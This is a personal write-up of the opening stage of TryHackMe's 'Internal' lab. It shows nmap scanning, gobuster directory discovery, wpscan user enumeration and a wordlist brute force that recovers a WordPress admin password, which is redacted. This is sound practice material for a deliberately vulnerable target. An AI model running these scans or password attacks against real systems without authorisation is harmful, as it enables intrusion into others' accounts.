This is a writeup for Internal on TryHackMe


The basics

As with other tasks, we have to make sure that we'ew connected to THM's VPN, boot the machine, and for this task, we need to modify /etc/hosts of the attacker machine. Like this:

$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

10.10.10.10 internal.thm

Without this we won't be able to tackle a part of the task. With that set, let's roll!


Tasks

Now what? Given that we need to find two flags from a user and from root, we start by scanning the server with nmap.

$ nmap -sC -sV -oN nmap/initial <ip>
Nmap scan report for <ip>
Host is up (0.064s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA)
|   256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA)
|_  256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

So! There are two opened ports, 22 and 80. For the time being we have not much use of the stuff on port 22. Although there's an exploit in the wild for enumerating the version of OpenSSH provided by the server, we don't need to use it. There's a better and faster workaround than to try to make the exploit work. (ugh)

Let's focus on the other opened port: 80. As shown above, nmap is telling us there's nothing on there but a default Apache page. But is it?

Time to bust out our second secret weapon: Gobuster

$ gobuster dir -u internal.thm -w /usr/share/wordlists/dirb/common.txt -x py,php
===============================================================
-----------------------------
| /blog (Status: 301)       |
-----------------------------
/index.html (Status: 200)
/javascript (Status: 301)
-----------------------------
| /phpmyadmin (Status: 301) |
-----------------------------
/server-status (Status: 403)
-----------------------------
| /wordpress (Status: 301)  |
-----------------------------

Right off the bat, three folders stick out: blog, phpmyadmin, and wordpress. Poking around even futher, we see that /blog and /wordpress are practically the same, we just focus on /blog. The other folder, /phpmyadmin could be considered as an entry point as well, but for now let's poke around wordpress.

With that said, let's bring out another scanner: Wpscan. For starters, we set it up to retrieve users:

$ wpscan --url http://internal.thm/blog/ --enumerate u
[+] admin
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

Well, of course. With a username found, let's hunt down the password for it.

$ wpscan --url http://internal.thm/blog/ -U admin -P /opt/rockyou.txt -t 3
[!] Valid Combinations Found:
 | Username: admin, Password: [redacted]

Woohoo! A tiny part of the task is done. There's still a long way to go, but we're getting there.

- by7e